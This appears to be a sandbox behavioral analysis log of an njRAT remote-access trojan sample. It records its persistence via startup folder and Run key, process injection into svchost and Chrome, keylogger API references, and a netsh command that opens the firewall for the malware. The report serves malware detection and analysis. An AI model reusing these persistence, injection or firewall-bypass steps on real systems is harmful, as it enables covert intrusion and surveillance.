Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_10006464 push 10006490h; ret 0_2_10006488
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000BC98 push 1000BD08h; ret 0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000A4A0 push 1000A4D3h; ret 0_2_1000A4CB
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000BCA4 push 1000BD08h; ret 0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000BD14 push 1000BD08h; ret 0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_10004D28 push 10004D54h; ret 0_2_10004D4C
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_10004D60 push 10004D8Ch; ret 0_2_10004D84
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_10006630 push 1000665Ch; ret 0_2_10006654
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000966C push 100096F4h; ret 0_2_100096EC
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000B6C0 push 1000B6ECh; ret 0_2_1000B6E4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_100096F6 push 10009781h; ret 0_2_10009779
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_100096F8 push 10009781h; ret 0_2_10009779
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000AF90 push 1000AFBCh; ret 0_2_1000AFB4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000AFC8 push 1000AFBCh; ret 0_2_1000AFB4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Code function: 0_2_1000CFE0 push 1000D02Eh; ret 0_2_1000D026
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_1000C038 push 1000C064h; ret 1_2_1000C05C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_1000619C push 100061D4h; ret 1_2_100061CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_100051A0 push 100051CCh; ret 1_2_100051C4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_100099C0 push 100099ECh; ret 1_2_100099E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_1000A240 push 1000A26Ch; ret 1_2_1000A264
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_100052B0 push 100052FCh; ret 1_2_100052F4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_10004AF8 push 10004B49h; ret 1_2_10004B41
Source: 7FW4ce2RDy.exe | Static PE information: section name: .imports
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Executable created and started: C:\Windows\SysWOW64\562Server.exe
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | File created: C:\Windows\SysWOW64\562Server.exe
Source: C:\Windows\SysWOW64\562Server.exe | File created: C:\Users\user\AppData\Local\Temp\System.exe
Source: C:\Users\user\AppData\Local\Temp\System.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | File created: C:\Windows\SysWOW64\562Server.exe

Boot Survival:

Drops PE files to the startup folder
Source: C:\Users\user\AppData\Local\Temp\System.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe
Creates autostart registry keys with suspicious names
Source: C:\Users\user\AppData\Local\Temp\System.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe
Source: C:\Users\user\AppData\Local\Temp\System.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe
Source: C:\Users\user\AppData\Local\Temp\System.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe
Source: C:\Users\user\AppData\Local\Temp\System.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe
Source: C:\Users\user\AppData\Local\Temp\System.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\562Server.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\System.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\System.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\562Server.exe TID: 3032 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 4940 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 4632 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\System.exe TID: 5252 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\System.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\562Server.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\System.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\System.exe Window / User API: threadDelayed 6064
                Source: 7FW4ce2RDy.exe Binary or memory string: jiejwogfdjieovevodnvfnievngsegtsrgrefsfsfsgrsgrttrhgtehgfsgrfgtrwegtrejytjyegrsfvfbgfsdfhgtrfsgfrsgfgregtregtrfrgjbfdkbnfsdjbvofsjfrfreSVWU
                Source: 7FW4ce2RDy.exe, svchost.exe Binary or memory string: trhgtehgfsgrfgtrwegtre
                Source: C:\Users\user\AppData\Local\Temp\System.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: 0_2_10005CA4 FindFirstFileW,FindClose,0_2_10005CA4
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\System.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\562Server.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10000000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000 protect: page execute and read and write
                Injects a PE file into a foreign process
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 10000000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000 value starts with: 4D5A
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: 0_2_1000BD14 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_1000BD14
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000C9D0
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 10000000
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 10000000
                .NET source code references suspicious native API functions
                Source: 562Server.exe.0.dr, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 562Server.exe.0.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: System.exe.4.dr, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: System.exe.4.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 4.2.562Server.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 4.0.562Server.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 8.0.System.exe.3e0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 8.0.System.exe.3e0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 8.2.System.exe.3e0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 8.2.System.exe.3e0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 16.0.System.exe.d50000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 16.0.System.exe.d50000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 16.2.System.exe.d50000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 16.2.System.exe.d50000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 19.0.System.exe.3e0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 19.0.System.exe.3e0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 19.2.System.exe.3e0000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 19.2.System.exe.3e0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 20.2.System.exe.240000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 20.2.System.exe.240000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 20.0.System.exe.240000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
                Source: 20.0.System.exe.240000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Contains functionality to inject threads in other processes
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: 0_2_100098A8 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,0_2_100098A8
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Process created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe'
                Source: C:\Windows\SysWOW64\562Server.exe Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe'
                Source: System.exe, 00000008.00000002.560209527.0000000002C76000.00000004.00000001.sdmp Binary or memory string: Program Manager
                Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp Binary or memory string: Progman
                Source: System.exe, 00000008.00000002.559411503.0000000001190000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: GetLocaleInfoA,0_2_10004A84
                Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\System.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: 0_2_10006B14 GetLocalTime,0_2_10006B14
                Source: C:\Users\user\Desktop\7FW4ce2RDy.exe Code function: 0_2_10004B4D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_10004B4D

                Lowering of HIPS / PFW / Operating System Security Settings:

                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Users\user\AppData\Local\Temp\System.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE
                Modifies the Windows firewall
                Source: C:\Users\user\AppData\Local\Temp\System.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE

                Stealing of Sensitive Information:

                Yara detected Njrat
                Source: Yara match File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
